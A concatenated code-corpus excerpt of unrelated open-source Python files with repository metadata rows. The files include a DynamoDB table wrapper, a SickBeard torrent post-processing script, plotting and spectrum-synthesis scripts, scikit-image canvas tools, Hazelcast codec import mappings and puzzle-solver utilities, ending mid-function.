attributes_to_get=attributes_to_get)
def get_item(self, hash_key, range_key=None, consistent_read=False, attributes_to_get=None):
"""
Performs the GetItem operation and returns the result
"""
return self.connection.get_item(
self.table_name,
hash_key,
range_key=range_key,
consistent_read=consistent_read,
attributes_to_get=attributes_to_get)
def scan(self,
attributes_to_get=None,
limit=None,
scan_filter=None,
return_consumed_capacity=None,
segment=None,
total_segments=None,
exclusive_start_key=None):
"""
Performs the scan operation
"""
return self.connection.scan(
self.table_name,
attributes_to_get=attributes_to_get,
limit=limit,
scan_filter=scan_filter,
return_consumed_capacity=return_consumed_capacity,
segment=segment,
total_segments=total_segments,
exclusive_start_key=exclusive_start_key)
def query(self,
hash_key,
attributes_to_get=None,
consistent_read=False,
exclusive_start_key=None,
index_name=None,
key_conditions=None,
limit=None,
return_consumed_capacity=None,
scan_index_forward=None,
select=None
):
"""
Performs the Query operation and returns the result
"""
return self.connection.query(
self.table_name,
hash_key,
attributes_to_get=attributes_to_get,
consistent_read=consistent_read,
exclusive_start_key=exclusive_start_key,
index_name=index_name,
key_conditions=key_conditions,
limit=limit,
return_consumed_capacity=return_consumed_capacity,
scan_index_forward=scan_index_forward,
select=select)
def describe_table(self):
"""
Performs the DescribeTable operation and returns the result
"""
return self.connection.describe_table(self.table_name)
def delete_table(self):
"""
Performs the DeleteTable operation and returns the result
"""
return self.connection.delete_table(self.table_name)
def update_table(self,
read_capacity_units=None,
write_capacity_units=None,
global_secondary_index_updates=None):
"""
Performs the UpdateTable operation and returns the result
"""
return self.connection.update_table(
self.table_name,
read_capacity_units=read_capacity_units,
write_capacity_units=write_capacity_units,
global_secondary_index_updates=global_secondary_index_updates)
def create_table(self,
attribute_definitions=None,
key_schema=None,
read_capacity_units=None,
write_capacity_units=None,
global_secondary_indexes=None,
local_secondary_indexes=None):
"""
Performs the CreateTable operation and returns the result
"""
return self.connection.create_table(
self.table_name,
attribute_definitions=attribute_definitions,
key_schema=key_schema,
read_capacity_units=read_capacity_units,
write_capacity_units=write_capacity_units,
global_secondary_indexes=global_secondary_indexes,
local_secondary_indexes=local_secondary_indexes
)
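# Illustrative usage sketch; the table, region and key values are hypothetical:
#   conn = TableConnection('Thread', region='us-east-1')
#   item = conn.get_item('my-hash-key', range_key='my-range-key')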
| mit | 4,248,419,250,073,645,600 | 34.533654 | 112 | 0.557705 | false | 4.722684 | false | false | false |
BeegorMif/HTPC-Manager | autoProcessTV/mediaToSickbeard.py | 1 | 6654 | #!/usr/bin/env python2
import sys
import os
import time
import ConfigParser
import logging
sickbeardPath = os.path.split(os.path.split(sys.argv[0])[0])[0]
sys.path.append(os.path.join( sickbeardPath, 'lib'))
sys.path.append(sickbeardPath)
configFilename = os.path.join(sickbeardPath, "config.ini")
import requests
config = ConfigParser.ConfigParser()
try:
fp = open(configFilename, "r")
config.readfp(fp)
fp.close()
except IOError, e:
print "Could not find/read Sickbeard config.ini: " + str(e)
print 'Possibly wrong mediaToSickbeard.py location. Ensure the file is in the autoProcessTV subdir of your Sickbeard installation'
time.sleep(3)
sys.exit(1)
scriptlogger = logging.getLogger('mediaToSickbeard')
formatter = logging.Formatter('%(asctime)s %(levelname)-8s MEDIATOSICKBEARD :: %(message)s', '%b-%d %H:%M:%S')
# Get the log dir setting from SB config
logdirsetting = config.get("General", "log_dir") if config.get("General", "log_dir") else 'Logs'
# put the log dir inside the SickBeard dir, unless an absolute path
logdir = os.path.normpath(os.path.join(sickbeardPath, logdirsetting))
logfile = os.path.join(logdir, 'sickbeard.log')
try:
handler = logging.FileHandler(logfile)
except:
print 'Unable to open/create the log file at ' + logfile
time.sleep(3)
sys.exit()
handler.setFormatter(formatter)
scriptlogger.addHandler(handler)
scriptlogger.setLevel(logging.DEBUG)
def utorrent():
# print 'Calling utorrent'
if len(sys.argv) < 2:
scriptlogger.error('No folder supplied - is this being called from uTorrent?')
print "No folder supplied - is this being called from uTorrent?"
time.sleep(3)
sys.exit()
dirName = sys.argv[1]
nzbName = sys.argv[2]
return (dirName, nzbName)
def transmission():
dirName = os.getenv('TR_TORRENT_DIR')
nzbName = os.getenv('TR_TORRENT_NAME')
return (dirName, nzbName)
def deluge():
if len(sys.argv) < 4:
scriptlogger.error('No folder supplied - is this being called from Deluge?')
print "No folder supplied - is this being called from Deluge?"
time.sleep(3)
sys.exit()
dirName = sys.argv[3]
nzbName = sys.argv[2]
return (dirName, nzbName)
def blackhole():
if None != os.getenv('TR_TORRENT_DIR'):
scriptlogger.debug('Processing script triggered by Transmission')
print "Processing script triggered by Transmission"
scriptlogger.debug(u'TR_TORRENT_DIR: ' + os.getenv('TR_TORRENT_DIR'))
scriptlogger.debug(u'TR_TORRENT_NAME: ' + os.getenv('TR_TORRENT_NAME'))
dirName = os.getenv('TR_TORRENT_DIR')
nzbName = os.getenv('TR_TORRENT_NAME')
else:
if len(sys.argv) < 2:
scriptlogger.error('No folder supplied - Your client should invoke the script with a Dir and a Release Name')
print "No folder supplied - Your client should invoke the script with a Dir and a Release Name"
time.sleep(3)
sys.exit()
dirName = sys.argv[1]
nzbName = sys.argv[2]
return (dirName, nzbName)
#def hella():
# if len(sys.argv) < 4:
# scriptlogger.error('No folder supplied - is this being called from HellaVCR?')
# print "No folder supplied - is this being called from HellaVCR?"
# sys.exit()
# else:
# dirName = sys.argv[3]
# nzbName = sys.argv[2]
#
# return (dirName, nzbName)
def main():
scriptlogger.info(u'Starting external PostProcess script ' + __file__)
host = config.get("General", "web_host")
port = config.get("General", "web_port")
username = config.get("General", "web_username")
password = config.get("General", "web_password")
try:
ssl = int(config.get("General", "enable_https"))
except (ConfigParser.NoOptionError, ValueError):
ssl = 0
try:
web_root = config.get("General", "web_root")
except ConfigParser.NoOptionError:
web_root = ""
tv_dir = config.get("General", "tv_download_dir")
use_torrents = int(config.get("General", "use_torrents"))
torrent_method = config.get("General", "torrent_method")
if not use_torrents:
scriptlogger.error(u'Enable Use Torrent on Sickbeard to use this Script. Aborting!')
print u'Enable Use Torrent on Sickbeard to use this Script. Aborting!'
time.sleep(3)
sys.exit()
if not torrent_method in ['utorrent', 'transmission', 'deluge', 'blackhole']:
scriptlogger.error(u'Unknown Torrent Method. Aborting!')
print u'Unknown Torrent Method. Aborting!'
time.sleep(3)
sys.exit()
dirName, nzbName = eval(locals()['torrent_method'])()
if dirName is None:
scriptlogger.error(u'MediaToSickbeard script needs a dir to be run. Aborting!')
print u'MediaToSickbeard script needs a dir to be run. Aborting!'
time.sleep(3)
sys.exit()
if not os.path.isdir(dirName):
scriptlogger.error(u'Folder ' + dirName + ' does not exist. Aborting AutoPostProcess.')
print u'Folder ' + dirName + ' does not exist. Aborting AutoPostProcess.'
time.sleep(3)
sys.exit()
if nzbName and os.path.isdir(os.path.join(dirName, nzbName)):
dirName = os.path.join(dirName, nzbName)
params = {}
params['quiet'] = 1
params['dir'] = dirName
if nzbName != None:
params['nzbName'] = nzbName
if ssl:
protocol = "https://"
else:
protocol = "http://"
if host == '0.0.0.0':
host = 'localhost'
url = protocol + host + ":" + port + web_root + "/home/postprocess/processEpisode"
scriptlogger.debug("Opening URL: " + url + ' with params=' + str(params))
print "Opening URL: " + url + ' with params=' + str(params)
try:
response = requests.get(url, auth=(username, password), params=params, verify=False)
except Exception, e:
scriptlogger.error(u': Unknown exception raised when opening url: ' + str(e))
time.sleep(3)
sys.exit()
if response.status_code == 401:
scriptlogger.error(u'Invalid Sickbeard Username or Password, check your config')
print 'Invalid Sickbeard Username or Password, check your config'
time.sleep(3)
sys.exit()
if response.status_code == 200:
scriptlogger.info(u'Script ' + __file__ + ' Successful')
print 'Script ' + __file__ + ' Successful'
time.sleep(3)
sys.exit()
if __name__ == '__main__':
main()
| gpl-3.0 | 1,972,086,942,503,040,300 | 31.617647 | 134 | 0.628194 | false | 3.522499 | true | false | false |
victorpoughon/master-thesis | python/outlier_analysis.py | 1 | 1365 | #!/usr/bin/env python3
import os
import os.path
import sys
import numpy as np
import matplotlib.pyplot as plt
from features_common import match_angle, base_plot
def outlier_frequency_plot(path, angles, threshold):
f, ax = base_plot()
ax.plot(100 * np.cumsum(np.abs(angles) > threshold) / angles.size)
ax.set_xlabel("Match number")
ax.set_ylabel("Outlier fraction (%)")
ax.set_ylim([0, 100])
f.savefig(path, bbox_inches='tight')
plt.close(f)
if __name__ == "__main__":
if len(sys.argv) < 2:
path = "."
else:
path = sys.argv[1]
# Produce outlier plots for all directories containing outlier_threshold.txt
for root, subdirs, files in os.walk(path):
if "matches.txt" in files:
shape = np.loadtxt(os.path.join(root, "shape.txt"))
matches = np.loadtxt(os.path.join(root, "matches.txt"), comments="#")
threshold = np.loadtxt(os.path.join(root, "outlier_threshold.txt"))
if threshold.size == 1:
print("outlier_analysis.py: " + root)
# Compute matches angles
angles = match_angle(matches, shape)
outlier_frequency_plot(os.path.join(root, "plot_outliers.pdf"), angles, threshold)
else:
print("outlier_analysis.py: " + root + " --- empty outlier_threshold.txt")
| mit | 2,286,111,514,915,068,000 | 34 | 98 | 0.605861 | false | 3.527132 | false | false | false |
dcf21/4most-4gp-scripts | src/scripts/synthesize_samples/synthesize_galah_with_microturbulence.py | 1 | 4084 | #!../../../../virtualenv/bin/python3
# -*- coding: utf-8 -*-
# NB: The shebang line above assumes you've installed a python virtual environment alongside your working copy of the
# <4most-4gp-scripts> git repository. It also only works if you invoke this python script from the directory where it
# is located. If these two assumptions are incorrect (e.g. you're using Conda), you can still use this script by typing
# <python synthesize_galah.py>, but <./synthesize_galah.py> will not work.
"""
Take parameters of GALAH sample of stars emailed by Karin on 30 Oct 2017, and synthesize spectra using
TurboSpectrum.
"""
import logging
import numpy as np
from astropy.io import fits
from lib.base_synthesizer import Synthesizer
# List of elements whose abundances we pass to TurboSpectrum
element_list = (
'Al', 'Ba', 'C', 'Ca', 'Ce', 'Co', 'Cr', 'Cu', 'Eu', 'K', 'La', 'Li', 'Mg', 'Mn', 'Mo', 'Na', 'Nd', 'Ni', 'O',
'Rb', 'Ru', 'Sc', 'Si', 'Sm', 'Sr', 'Ti', 'V', 'Y', 'Zn', 'Zr'
)
# Start logging our progress
logging.basicConfig(level=logging.INFO, format='[%(asctime)s] %(levelname)s:%(filename)s:%(message)s',
datefmt='%d/%m/%Y %H:%M:%S')
logger = logging.getLogger(__name__)
logger.info("Synthesizing GALAH sample spectra, with microturbulence")
# Instantiate base synthesizer
synthesizer = Synthesizer(library_name="galah_sample_v2",
logger=logger,
docstring=__doc__)
# Table supplies list of abundances for GES stars
f = fits.open("../../../../downloads/GALAH_trainingset_4MOST_errors.fits")
galah_stars = f[1].data
galah_fields = galah_stars.names
# Loop over stars extracting stellar parameters from FITS file
star_list = []
for star_index in range(len(galah_stars)):
fe_abundance = float(galah_stars.Feh_sme[star_index])
star_list_item = {
"name": "star_{:08d}".format(star_index),
"Teff": float(galah_stars.Teff_sme[star_index]),
"[Fe/H]": fe_abundance,
"logg": float(galah_stars.Logg_sme[star_index]),
"extra_metadata": {},
"free_abundances": {},
"input_data": {}
}
# Work out micro-turbulent velocity
if (star_list_item['logg'] >= 4.2) and (star_list_item['Teff'] <= 5500):
star_list_item['microturbulence'] = \
1.1 + 1e-4 * (star_list_item['Teff'] - 5500) + 4e-7 * (star_list_item['Teff'] - 5500) ** 2
else:
star_list_item['microturbulence'] = \
1.1 + 1.6e-4 * (star_list_item['Teff'] - 5500)
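# Worked example (hypothetical star): for Teff = 5777 K the second branch
# applies (Teff > 5500), giving 1.1 + 1.6e-4 * (5777 - 5500), i.e. a
# microturbulence of roughly 1.14 km/s.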
# Pass list of the abundances of individual elements to TurboSpectrum
free_abundances = star_list_item["free_abundances"]
metadata = star_list_item["extra_metadata"]
for element in element_list:
if (not synthesizer.args.elements) or (element in synthesizer.args.elements.split(",")):
fits_field_name = "{}_abund_sme".format(element)
# Abundance is specified as [X/Fe]. Convert to [X/H]
abundance = galah_stars[fits_field_name][star_index] + fe_abundance
if np.isfinite(abundance):
free_abundances[element] = float(abundance)
metadata["flag_{}".format(element)] = float(
galah_stars["flag_{}_abund_sme".format(element)][star_index])
# Propagate all input fields from the FITS file into <input_data>
input_data = star_list_item["input_data"]
for col_name in galah_fields:
value = galah_stars[col_name][star_index]
if galah_stars.dtype[col_name].type is np.string_:
typed_value = str(value)
else:
typed_value = float(value)
input_data[col_name] = typed_value
star_list.append(star_list_item)
# Pass list of stars to synthesizer
synthesizer.set_star_list(star_list)
# Output data into sqlite3 db
synthesizer.dump_stellar_parameters_to_sqlite()
# Create new SpectrumLibrary
synthesizer.create_spectrum_library()
# Iterate over the spectra we're supposed to be synthesizing
synthesizer.do_synthesis()
# Close TurboSpectrum synthesizer instance
synthesizer.clean_up()
| mit | 1,813,588,961,459,979,500 | 37.168224 | 119 | 0.643732 | false | 3.143957 | false | false | false |
SamHames/scikit-image | skimage/viewer/canvastools/base.py | 1 | 5472 | import numpy as np
try:
from matplotlib import lines
except ImportError:
pass
__all__ = ['CanvasToolBase', 'ToolHandles']
def _pass(*args):
pass
class CanvasToolBase(object):
"""Base canvas tool for matplotlib axes.
Parameters
----------
ax : :class:`matplotlib.axes.Axes`
Matplotlib axes where tool is displayed.
on_move : function
Function called whenever a control handle is moved.
This function must accept the end points of the line as the only argument.
on_release : function
Function called whenever the control handle is released.
on_enter : function
Function called whenever the "enter" key is pressed.
useblit : bool
If True, update canvas by blitting, which is much faster than normal
redrawing (turn off for debugging purposes).
"""
def __init__(self, ax, on_move=None, on_enter=None, on_release=None,
useblit=True):
self.ax = ax
self.canvas = ax.figure.canvas
self.img_background = None
self.cids = []
self._artists = []
self.active = True
if useblit:
self.connect_event('draw_event', self._blit_on_draw_event)
self.useblit = useblit
self.callback_on_move = _pass if on_move is None else on_move
self.callback_on_enter = _pass if on_enter is None else on_enter
self.callback_on_release = _pass if on_release is None else on_release
self.connect_event('key_press_event', self._on_key_press)
def connect_event(self, event, callback):
"""Connect callback with an event.
This should be used in lieu of `figure.canvas.mpl_connect` since this
function stores callback ids for later clean up.
"""
cid = self.canvas.mpl_connect(event, callback)
self.cids.append(cid)
def disconnect_events(self):
"""Disconnect all events created by this widget."""
for c in self.cids:
self.canvas.mpl_disconnect(c)
def ignore(self, event):
"""Return True if event should be ignored.
This method (or a version of it) should be called at the beginning
of any event callback.
"""
return not self.active
def set_visible(self, val):
for artist in self._artists:
artist.set_visible(val)
def _blit_on_draw_event(self, event=None):
self.img_background = self.canvas.copy_from_bbox(self.ax.bbox)
self._draw_artists()
def _draw_artists(self):
for artist in self._artists:
self.ax.draw_artist(artist)
def remove(self):
"""Remove artists and events from axes.
Note that the naming here mimics the interface of Matplotlib artists.
"""
#TODO: For some reason, RectangleTool doesn't get properly removed
self.disconnect_events()
for a in self._artists:
a.remove()
def redraw(self):
"""Redraw image and canvas artists.
This method should be called by subclasses when artists are updated.
"""
if self.useblit and self.img_background is not None:
self.canvas.restore_region(self.img_background)
self._draw_artists()
self.canvas.blit(self.ax.bbox)
else:
self.canvas.draw_idle()
def _on_key_press(self, event):
if event.key == 'enter':
self.callback_on_enter(self.geometry)
self.set_visible(False)
self.redraw()
@property
def geometry(self):
"""Geometry information that gets passed to callback functions."""
return None
class ToolHandles(object):
"""Control handles for canvas tools.
Parameters
----------
ax : :class:`matplotlib.axes.Axes`
Matplotlib axes where tool handles are displayed.
x, y : 1D arrays
Coordinates of control handles.
marker : str
Shape of marker used to display handle. See `matplotlib.pyplot.plot`.
marker_props : dict
Additional marker properties. See :class:`matplotlib.lines.Line2D`.
"""
def __init__(self, ax, x, y, marker='o', marker_props=None):
self.ax = ax
props = dict(marker=marker, markersize=7, mfc='w', ls='none',
alpha=0.5, visible=False)
props.update(marker_props if marker_props is not None else {})
self._markers = lines.Line2D(x, y, animated=True, **props)
self.ax.add_line(self._markers)
self.artist = self._markers
@property
def x(self):
return self._markers.get_xdata()
@property
def y(self):
return self._markers.get_ydata()
def set_data(self, pts, y=None):
"""Set x and y positions of handles"""
if y is not None:
x = pts
pts = np.array([x, y])
self._markers.set_data(pts)
def set_visible(self, val):
self._markers.set_visible(val)
def set_animated(self, val):
self._markers.set_animated(val)
def draw(self):
self.ax.draw_artist(self._markers)
def closest(self, x, y):
"""Return index and pixel distance to closest index."""
pts = np.transpose((self.x, self.y))
# Transform data coordinates to pixel coordinates.
pts = self.ax.transData.transform(pts)
diff = pts - ((x, y))
dist = np.sqrt(np.sum(diff**2, axis=1))
return np.argmin(dist), np.min(dist)
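# Illustrative usage sketch (assumes an existing Matplotlib axes object `ax`):
#   handles = ToolHandles(ax, x=[0, 50], y=[0, 50])
#   handles.set_visible(True)
#   idx, dist = handles.closest(10, 12)  # nearest handle index and pixel distance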
| bsd-3-clause | -8,322,848,763,189,975,000 | 30.448276 | 78 | 0.606725 | false | 3.965217 | false | false | false |
mmedenjak/hazelcast-client-protocol | py/__init__.py | 1 | 10457 | import keyword
import re
def py_types_encode_decode(t):
if t not in _py_types:
raise NotImplementedError("Missing type Mapping")
_pattern1 = re.compile("(.)([A-Z][a-z]+)")
_pattern2 = re.compile("([a-z0-9])([A-Z])")
def py_param_name(type_name):
type_name = _pattern1.sub(r"\1_\2", type_name)
type_name = _pattern2.sub(r"\1_\2", type_name).lower()
if keyword.iskeyword(type_name):
return "_%s" % type_name
return type_name
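# Illustrative examples of the conversion above (inputs are hypothetical):
#   py_param_name("memberInfo")     -> "member_info"
#   py_param_name("startTimeNanos") -> "start_time_nanos"
#   py_param_name("from")           -> "_from"  (Python keywords get a leading underscore)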
def py_get_import_path_holders(param_type):
return import_paths.get(param_type, [])
py_ignore_service_list = {
"Cache",
"CardinalityEstimator",
"Client.addPartitionLostListener",
"Client.authenticationCustom",
"Client.createProxies",
"Client.removeMigrationListener",
"Client.removePartitionLostListener",
"Client.triggerPartitionAssignment",
"ContinuousQuery",
"CPSubsystem",
"DurableExecutor",
"DynamicConfig",
"ExecutorService.cancelOnMember",
"ExecutorService.cancelOnPartition",
"Map.addPartitionLostListener",
"Map.aggregate",
"Map.aggregateWithPredicate",
"Map.eventJournalRead",
"Map.eventJournalSubscribe",
"Map.project",
"Map.projectWithPredicate",
"Map.removeAll",
"Map.removeInterceptor",
"Map.removePartitionLostListener",
"Map.submitToKey",
"MultiMap.delete",
"MC",
"Queue.drainTo",
"ReplicatedMap.addNearCacheEntryListener",
"ScheduledExecutor",
"Sql",
"Topic.publishAll",
"TransactionalMap.containsValue",
"XATransaction",
}
class ImportPathHolder:
def __init__(self, name, path):
self.name = name
self.path = path
def get_import_statement(self):
return "from hazelcast.%s import %s" % (self.path, self.name)
class PathHolders:
DataCodec = ImportPathHolder("DataCodec", "protocol.builtin")
ByteArrayCodec = ImportPathHolder("ByteArrayCodec", "protocol.builtin")
LongArrayCodec = ImportPathHolder("LongArrayCodec", "protocol.builtin")
Address = ImportPathHolder("Address", "core")
AddressCodec = ImportPathHolder("AddressCodec", "protocol.codec.custom.address_codec")
ErrorHolder = ImportPathHolder("ErrorHolder", "protocol")
ErrorHolderCodec = ImportPathHolder("ErrorHolderCodec", "protocol.codec.custom.error_holder_codec")
StackTraceElement = ImportPathHolder("StackTraceElement", "protocol")
StackTraceElementCodec = ImportPathHolder("StackTraceElementCodec",
"protocol.codec.custom.stack_trace_element_codec")
SimpleEntryView = ImportPathHolder("SimpleEntryView", "core")
SimpleEntryViewCodec = ImportPathHolder("SimpleEntryViewCodec", "protocol.codec.custom.simple_entry_view_codec")
DistributedObjectInfo = ImportPathHolder("DistributedObjectInfo", "core")
DistributedObjectInfoCodec = ImportPathHolder("DistributedObjectInfoCodec",
"protocol.codec.custom.distributed_object_info_codec")
MemberInfo = ImportPathHolder("MemberInfo", "core")
MemberInfoCodec = ImportPathHolder("MemberInfoCodec", "protocol.codec.custom.member_info_codec")
MemberVersion = ImportPathHolder("MemberVersion", "core")
MemberVersionCodec = ImportPathHolder("MemberVersionCodec", "protocol.codec.custom.member_version_codec")
StringCodec = ImportPathHolder("StringCodec", "protocol.builtin", )
ListLongCodec = ImportPathHolder("ListLongCodec", "protocol.builtin")
ListIntegerCodec = ImportPathHolder("ListIntegerCodec", "protocol.builtin")
ListUUIDCodec = ImportPathHolder("ListUUIDCodec", "protocol.builtin")
ListDataCodec = ImportPathHolder("ListDataCodec", "protocol.builtin")
ListMultiFrameCodec = ImportPathHolder("ListMultiFrameCodec", "protocol.builtin")
EntryListCodec = ImportPathHolder("EntryListCodec", "protocol.builtin")
EntryListLongByteArrayCodec = ImportPathHolder("EntryListLongByteArrayCodec", "protocol.builtin")
EntryListIntegerUUIDCodec = ImportPathHolder("EntryListIntegerUUIDCodec", "protocol.builtin")
EntryListIntegerLongCodec = ImportPathHolder("EntryListIntegerLongCodec", "protocol.builtin")
EntryListIntegerIntegerCodec = ImportPathHolder("EntryListIntegerIntegerCodec", "protocol.builtin")
EntryListUUIDLongCodec = ImportPathHolder("EntryListUUIDLongCodec", "protocol.builtin")
EntryListUUIDUUIDCodec = ImportPathHolder("EntryListUUIDUUIDCodec", "protocol.builtin")
EntryListUUIDListIntegerCodec = ImportPathHolder("EntryListUUIDListIntegerCodec", "protocol.builtin")
MapCodec = ImportPathHolder("MapCodec", "protocol.builtin")
CodecUtil = ImportPathHolder("CodecUtil", "protocol.builtin")
IndexConfig = ImportPathHolder("IndexConfig", "config")
IndexConfigCodec = ImportPathHolder("IndexConfigCodec", "protocol.codec.custom.index_config_codec")
BitmapIndexOptions = ImportPathHolder("BitmapIndexOptions", "config")
BitmapIndexOptionsCodec = ImportPathHolder("BitmapIndexOptionsCodec",
"protocol.codec.custom.bitmap_index_options_codec")
PagingPredicateHolder = ImportPathHolder("PagingPredicateHolder", "protocol")
PagingPredicateHolderCodec = ImportPathHolder("PagingPredicateHolderCodec",
"protocol.codec.custom.paging_predicate_holder_codec")
AnchorDataListHolder = ImportPathHolder("AnchorDataListHolder", "protocol")
AnchorDataListHolderCodec = ImportPathHolder("AnchorDataListHolderCodec",
"protocol.codec.custom.anchor_data_list_holder_codec")
EndpointQualifier = ImportPathHolder("EndpointQualifier", "protocol")
EndpointQualifierCodec = ImportPathHolder("EndpointQualifierCodec",
"protocol.codec.custom.endpoint_qualifier_codec")
RaftGroupId = ImportPathHolder("RaftGroupId", "protocol")
RaftGroupIdCodec = ImportPathHolder("RaftGroupIdCodec", "protocol.codec.custom.raft_group_id_codec")
import_paths = {
"CodecUtil": PathHolders.CodecUtil,
"longArray": [PathHolders.LongArrayCodec],
"byteArray": [PathHolders.ByteArrayCodec],
"String": [PathHolders.StringCodec],
"Data": [PathHolders.DataCodec],
"Address": [PathHolders.Address, PathHolders.AddressCodec],
"ErrorHolder": [PathHolders.ErrorHolder, PathHolders.ErrorHolderCodec],
"StackTraceElement": [PathHolders.StackTraceElement, PathHolders.StackTraceElementCodec],
"SimpleEntryView": [PathHolders.SimpleEntryView, PathHolders.SimpleEntryViewCodec],
"DistributedObjectInfo": [PathHolders.DistributedObjectInfo, PathHolders.DistributedObjectInfoCodec],
"MemberInfo": [PathHolders.MemberInfo, PathHolders.MemberInfoCodec],
"MemberVersion": [PathHolders.MemberVersion, PathHolders.MemberVersionCodec],
"RaftGroupId": [PathHolders.RaftGroupId, PathHolders.RaftGroupIdCodec],
"List_Long": [PathHolders.ListLongCodec],
"List_Integer": [PathHolders.ListIntegerCodec],
"List_UUID": [PathHolders.ListUUIDCodec],
"List_String": [PathHolders.ListMultiFrameCodec, PathHolders.StringCodec],
"List_Data": [PathHolders.ListMultiFrameCodec, PathHolders.DataCodec],
"ListCN_Data": [PathHolders.ListMultiFrameCodec, PathHolders.DataCodec],
"List_MemberInfo": [PathHolders.ListMultiFrameCodec, PathHolders.MemberInfoCodec],
"List_DistributedObjectInfo": [PathHolders.ListMultiFrameCodec, PathHolders.DistributedObjectInfoCodec],
"List_StackTraceElement": [PathHolders.ListMultiFrameCodec, PathHolders.StackTraceElementCodec],
"EntryList_String_String": [PathHolders.EntryListCodec, PathHolders.StringCodec],
"EntryList_String_byteArray": [PathHolders.EntryListCodec, PathHolders.StringCodec, PathHolders.ByteArrayCodec],
"EntryList_Long_byteArray": [PathHolders.EntryListLongByteArrayCodec],
"EntryList_Integer_UUID": [PathHolders.EntryListIntegerUUIDCodec],
"EntryList_Integer_Long": [PathHolders.EntryListIntegerLongCodec],
"EntryList_Integer_Integer": [PathHolders.EntryListIntegerIntegerCodec],
"EntryList_UUID_Long": [PathHolders.EntryListUUIDLongCodec],
"EntryList_String_EntryList_Integer_Long": [PathHolders.EntryListCodec, PathHolders.StringCodec,
PathHolders.EntryListIntegerLongCodec],
"EntryList_UUID_UUID": [PathHolders.EntryListUUIDUUIDCodec],
"EntryList_UUID_List_Integer": [PathHolders.EntryListUUIDListIntegerCodec],
"EntryList_Data_Data": [PathHolders.EntryListCodec, PathHolders.DataCodec],
"EntryList_Data_List_Data": [PathHolders.EntryListCodec, PathHolders.DataCodec, PathHolders.ListDataCodec],
"Map_String_String": [PathHolders.MapCodec, PathHolders.StringCodec],
"IndexConfig": [PathHolders.IndexConfig, PathHolders.IndexConfigCodec],
"ListIndexConfig": [PathHolders.IndexConfigCodec, PathHolders.ListMultiFrameCodec],
"BitmapIndexOptions": [PathHolders.BitmapIndexOptions, PathHolders.BitmapIndexOptionsCodec],
"AnchorDataListHolder": [PathHolders.AnchorDataListHolder, PathHolders.AnchorDataListHolderCodec],
"PagingPredicateHolder": [PathHolders.PagingPredicateHolder, PathHolders.PagingPredicateHolderCodec],
"EndpointQualifier": [PathHolders.EndpointQualifier, PathHolders.EndpointQualifierCodec],
"Map_EndpointQualifier_Address": [PathHolders.MapCodec, PathHolders.EndpointQualifierCodec,
PathHolders.AddressCodec]
}
_py_types = {
"boolean",
"byte",
"int",
"long",
"UUID",
"byteArray",
"longArray",
"String",
"Data",
"Address",
"DistributedObjectInfo",
"SimpleEntryView",
"ErrorHolder",
"StackTraceElement",
"MemberInfo",
"MemberVersion",
"EndpointQualifier",
"RaftGroupId",
"AnchorDataListHolder",
"PagingPredicateHolder",
"IndexConfig",
"BitmapIndexOptions",
"List_Integer",
"List_Long",
"List_UUID",
"List_byteArray",
"List_Data",
"List_DistributedObjectInfo",
"List_MemberInfo",
"List_String",
"List_StackTraceElement",
"ListCN_Data",
"EntryList_UUID_Long",
"EntryList_String_String",
"EntryList_UUID_List_Integer",
"EntryList_Data_Data",
"Map_String_String",
"Map_EndpointQualifier_Address",
}
def py_escape_keyword(value):
if value in keyword.kwlist:
return "%s_" % value
else:
return value
| apache-2.0 | 2,040,683,131,968,967,400 | 44.864035 | 116 | 0.724969 | false | 3.843072 | true | false | false |
pirius/draught-board-puzzle-aka-checkerboard-puzzle-solver | python/source/checkerboardpuzzle_utils.py | 1 | 1570 | from numpy import array, rot90, fliplr, array_equal
from checkerboardpuzzle_stone import Rotation
def generate_rotated_nparrays(nparray):
"""generate rotated and mirrored versions of given nparray."""
r1 = rot90(nparray)
r2 = rot90(r1)
r3 = rot90(r2)
f1 = fliplr(nparray)
f2 = fliplr(r1)
f3 = fliplr(r2)
f4 = fliplr(r3)
all_rot = [nparray,r1,r2,r3,f1,f2,f3,f4]
return all_rot
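# Illustrative example (hypothetical 2x3 piece):
#   generate_rotated_nparrays(array([[1, 1, 1],
#                                    [1, 0, 0]]))
# returns eight arrays: the original, its three 90-degree rotations, and the
# left-right flip of each of those four; duplicates can be filtered with
# unique_nparrays() below.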
def generate_rotations(fields):
"""generate all rotations of that stone."""
#r1 = rot90(fields)
#r2 = rot90(r1)
#r3 = rot90(r2)
#f1 = fliplr(fields)
#f2 = fliplr(r1)
#f3 = fliplr(r2)
#f4 = fliplr(r3)
#all_rot = [r1,r2,r3,f1,f2,f3,f4]
all_rot = generate_rotated_nparrays(fields)
# check if rotations are equal
rotations = [] # [Rotation(fields)]
for r_new in all_rot:
l = len(filter(lambda r_old:array_equal(r_old.nparray,r_new), rotations))
if l > 1:
raise Exception('Rotations doubled? That should be impossible!')
elif l == 0:
# not in rotations yet, add
rotations = rotations + [Rotation(r_new)]
return rotations
def unique_nparrays(nparrays):
"""return unique list of nparrays."""
unique = []
for a in nparrays:
for u in unique:
if (a == u).all():
break
else:
unique = unique + [a]
return unique
def append_to_file(filepath, text):
"""append text to given file."""
with open(filepath, 'a') as myfile:
myfile.write(text)
myfile.close() | lgpl-3.0 | 5,289,287,308,255,993,000 | 28.641509 | 81 | 0.593631 | false | 2.864964 | false | false | false |
seeba8/str8tssolver | field.py | 1 | 6062 | from square import Square
from street import Street
class Field:
def __init__(self, test=None):
self.streets = set()
if test != None:
blacks = test["blacks"]
values = test["values"]
self.squares = [Square(i, blacks[i] == "1", "123456789" if values[i] == "0" else values[i]) for i in
range(81)]
self.collect_streets()
else:
self.squares = [Square(i) for i in range(81)]
def solve(self):
last_perf = 0
current_perf = 1
while (last_perf != current_perf):
last_perf = self.get_total_length()
self.eliminate_possibilities()
current_perf = self.get_total_length()
if self.is_solved():
return True
return False
def is_solved(self):
for s in self:
if not s.is_number() and not s.is_black:
return False
return True
def collect_streets(self):
for square in self:
if not square.is_black:
s = self.get_hstreet(square)
if s != None:
self.streets.add(s)
s = self.get_vstreet(square)
if s != None:
self.streets.add(s)
def __getitem__(self,i):
if isinstance(i,tuple):
x,y = i
if x < 0 or x >= 9 or y < 0 or y >= 9:
raise IndexError
i = y * 9 + x
try:
return self.squares[i]
except:
raise
def __iter__(self):
for s in self.squares:
yield s
def get_row(self, square, without_square=False):
for i in range(9):
s = self[i, square.y]
if not without_square or s != square:
yield s
def get_column(self, square, without_square=False):
for i in range(9):
s = self[square.x, i]
if not without_square or s != square:
yield s
def get_hstreet(self, square):
x = square.x
y = square.y
street = {square}
if x - 1 >= 0 and not self[x - 1, y].is_black:
return None
for i in range(1, 10):
try:
if not self[x + i, y].is_black:
